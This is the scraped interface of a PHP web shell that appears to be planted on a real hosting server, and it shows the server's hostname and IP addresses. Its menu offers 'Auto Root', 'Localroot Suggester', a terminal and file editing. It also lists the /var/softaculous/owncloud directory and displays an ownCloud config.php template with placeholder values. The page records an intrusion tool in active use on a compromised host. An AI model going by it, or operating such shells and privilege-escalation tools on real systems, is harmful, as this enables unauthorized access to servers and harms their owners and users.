Linux bear.hostingplus.cl 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
LiteSpeed
Server IP : 192.140.57.17 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : explo
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
owncloud /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-03-05 10:16
php53
[ DIR ]
drwxr-xr-x
2026-03-05 10:16
php56
[ DIR ]
drwxr-xr-x
2026-03-05 10:16
php71
[ DIR ]
drwxr-xr-x
2026-03-05 10:16
php81
[ DIR ]
drwxr-xr-x
2026-03-05 10:16
php82
[ DIR ]
drwxr-xr-x
2026-03-05 10:16
.htaccess
3.43
KB
-rw-r--r--
2021-12-23 05:18
PasswordHash.php
6.67
KB
-rw-r--r--
2021-12-23 05:18
_.htaccess
315
B
-rw-r--r--
2021-12-23 05:18
changelog.txt
6.18
KB
-rw-r--r--
2026-02-20 02:47
check_suphp.php
101
B
-rw-r--r--
2021-12-23 05:18
clone.php
5.13
KB
-rw-r--r--
2026-02-20 06:40
config.php
917
B
-rw-r--r--
2026-02-20 02:47
data.zip
794
B
-rw-r--r--
2026-02-20 02:47
edit.php
4.82
KB
-rw-r--r--
2026-02-20 06:40
edit.xml
433
B
-rw-r--r--
2021-12-23 05:18
fileindex.php
269
B
-rw-r--r--
2021-12-23 05:18
import.php
3.87
KB
-rw-r--r--
2026-02-20 06:40
info.xml
3.52
KB
-rw-r--r--
2026-02-20 02:47
install.js
924
B
-rw-r--r--
2021-12-23 05:18
install.php
11.3
KB
-rw-r--r--
2026-02-20 06:40
install.xml
2.5
KB
-rw-r--r--
2021-12-23 05:18
md5
1.45
KB
-rw-r--r--
2026-02-20 06:40
notes.txt
1.83
KB
-rw-r--r--
2024-08-07 05:13
owncloud.sql
43.01
KB
-rw-r--r--
2026-02-20 02:47
owncloud.zip
98.46
MB
-rw-r--r--
2026-02-20 02:47
restore.php
2.85
KB
-rw-r--r--
2026-02-20 06:40
update_pass.php
6.64
KB
-rw-r--r--
2023-03-03 09:12
upgrade.php
5.73
KB
-rw-r--r--
2026-02-20 06:40
upgrade.xml
330
B
-rw-r--r--
2021-12-23 05:18
Save
Rename
<?php $CONFIG = array ( 'instanceid' => '[[instanceid]]', 'passwordsalt' => '[[passwordsalt]]', 'secret' => '[[secret]]', 'trusted_domains' => array ( 0 => '[[domhost]]', ), 'datadirectory' => '[[softdatadir]]', 'overwrite.cli.url' => '[[softurl]]', 'dbtype' => 'mysql', 'version' => '10.16.1.0', 'dbname' => '[[softdb]]', 'dbconnectionstring' => '', 'dbhost' => '[[softdbhost]]', 'dbtableprefix' => 'oc_', 'mysql.utf8mb4' => true, 'dbuser' => '[[softdbuser]]', 'dbpassword' => '[[softdbpass]]', 'allow_user_to_change_mail_address' => '', 'logtimezone' => 'UTC', 'apps_paths' => array ( 0 => array ( 'path' => '[[softpath]]/apps', 'url' => '/apps', 'writable' => false, ), 1 => array ( 'path' => '[[softpath]]/apps-external', 'url' => '/apps-external', 'writable' => true, ), ), 'installed' => true, );